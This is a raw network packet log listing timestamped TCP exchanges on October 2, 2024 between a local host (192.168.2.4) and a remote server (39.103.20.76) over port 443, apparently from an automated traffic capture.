Oct 2, 2024 04:27:27.989330053 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.116909981 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.116940975 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.116964102 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.117067099 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.117075920 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.117093086 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.117150068 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.117160082 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.117171049 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.117253065 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.226341009 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.226352930 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.226373911 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.226380110 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.226548910 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.226556063 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.226568937 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.226597071 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.226609945 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.226615906 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.226629972 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.226733923 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.226739883 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.226758003 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.226809978 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.226814032 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.226828098 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.226977110 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.226984024 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.227000952 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.227103949 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.595480919 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.596278906 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.596291065 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.596308947 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.596312046 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.596345901 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.596353054 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.596494913 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.596502066 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.596539974 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.596544981 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.596586943 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.596606016 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.746733904 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.746742010 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.746762037 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.746788025 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.746936083 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.746942997 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.747026920 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.747033119 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.747071028 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.747119904 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.747124910 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.747143984 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.747240067 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.747246981 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:28.747296095 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.747356892 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:28.747380972 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:29.172835112 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:29.333925009 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:30.308068991 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:30.308100939 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:30.490470886 CEST	49739	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:30.490526915 CEST	443	49739	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:30.490624905 CEST	49739	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:30.490833998 CEST	49739	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:30.490849972 CEST	443	49739	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:31.782640934 CEST	443	49739	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:31.782727957 CEST	49739	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:31.783114910 CEST	49739	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:31.783128977 CEST	443	49739	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:31.783411980 CEST	49739	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:31.783416986 CEST	443	49739	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:32.467679977 CEST	443	49739	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:32.467701912 CEST	443	49739	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:32.467814922 CEST	49739	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:32.467830896 CEST	443	49739	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:32.467907906 CEST	49739	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:32.468127966 CEST	443	49739	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:32.468213081 CEST	49739	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:32.468781948 CEST	443	49739	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:32.468837976 CEST	49739	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:32.468839884 CEST	443	49739	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:32.468883038 CEST	49739	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:32.469291925 CEST	49739	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:32.469302893 CEST	443	49739	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:32.482449055 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:32.482491016 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:32.482588053 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:32.482870102 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:32.482886076 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:33.775296926 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:33.775363922 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:33.775899887 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:33.775907040 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:33.776153088 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:33.776158094 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.140607119 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.140676022 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.140722990 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.140734911 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.140752077 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.140805006 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.141053915 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.141119003 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.142232895 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.142342091 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.146389008 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.146456003 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.232325077 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.232501984 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.232552052 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.232561111 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.232570887 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.232593060 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.232611895 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.232620955 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.232654095 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.232680082 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.233393908 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.233469963 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.234051943 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.234123945 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.234529972 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.234602928 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.235227108 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.235301018 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.235467911 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.235542059 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.237452030 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.237520933 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.323462009 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.323543072 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.323565960 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.323636055 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.323662996 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.323743105 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.323776960 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.323836088 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.323889017 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.323991060 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.323997974 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.324018955 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.324126959 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.324170113 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.324177980 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.324194908 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.324228048 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.324232101 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.324256897 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.324290991 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.324327946 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.324646950 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.324707985 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.324743032 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.324809074 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.324839115 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.324903011 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.324924946 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.324986935 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.325395107 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.325462103 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.326601028 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.326685905 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.328289032 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.328365088 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.328377962 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.328438044 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.414068937 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.414146900 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.414206028 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.414365053 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.414378881 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.414438963 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.414475918 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.414541006 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.414601088 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.414673090 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.414696932 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.414758921 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.414829969 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.414892912 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.414923906 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.414987087 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.415018082 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.415077925 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.415136099 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.415198088 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.415230036 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.415294886 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.415360928 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.415426016 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.415476084 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.415539980 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.415560961 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.415620089 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.416543961 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.416609049 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.420732021 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.420805931 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.422888994 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.422960043 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.425023079 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.425088882 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.429121971 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.429198980 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.431159973 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.431231022 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.435379028 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.435452938 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.437542915 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.437613010 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.439620018 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.439688921 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.443733931 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.443805933 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.445884943 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.445960045 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.450041056 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.450110912 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.452136040 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.452203989 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.456298113 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.456365108 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.467621088 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.467696905 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.510129929 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.510270119 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.510297060 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.510363102 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.510412931 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.510477066 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.510509014 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.510572910 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.510615110 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.510677099 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.510749102 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.510816097 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.510843992 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.510904074 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.510953903 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.511014938 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.511065006 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.511126041 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.511162996 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.511220932 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.511255980 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.511318922 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.511344910 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.511400938 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.511445999 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.511502028 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.511533022 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.511590958 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.511626005 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.511686087 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.511715889 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.511779070 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.511810064 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.511869907 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.511893034 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.511955976 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.514975071 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.515043020 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.516968966 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.517030001 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.521123886 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.521198034 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.641163111 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.641289949 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.641371965 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.641371965 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.641381025 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.641410112 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.641432047 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.641438007 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.641473055 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.641510010 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.646379948 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.646464109 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.649024010 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.649101973 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.652075052 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.652141094 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.654628038 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.654699087 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.657071114 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.657156944 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.660768032 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.660845041 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.663409948 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.663491964 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.667500973 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.667576075 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.669568062 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.669645071 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.673743963 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.673830032 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.675198078 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.675266027 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.676723957 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.676809072 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.681920052 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.682003975 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.682945013 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.683017969 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.684979916 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.685064077 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.686064005 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.686134100 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.686161041 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.686223984 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.686479092 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.686534882 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.687510967 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.687575102 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.688533068 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.688590050 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.688657045 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.688760042 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.688962936 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.689027071 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.689543009 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.689599037 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.689651966 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.689737082 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.692594051 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.692658901 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.694720984 CEST	443	49740	39.103.20.76	192.168.2.4
